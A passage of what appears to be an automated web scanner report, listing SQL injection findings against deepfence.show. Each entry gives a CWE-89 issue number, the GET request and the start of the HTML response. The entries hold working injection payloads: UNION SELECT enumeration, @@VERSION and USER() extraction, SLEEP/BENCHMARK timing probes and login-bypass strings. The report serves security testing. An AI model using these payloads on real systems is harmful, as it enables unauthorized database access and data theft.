href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1652\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 29#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1653\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1654\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1655\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" OR 1 = 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1656\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1657\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT USER()\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1658\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1659\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1660\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1661\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1662\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1663\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1664\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1665\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 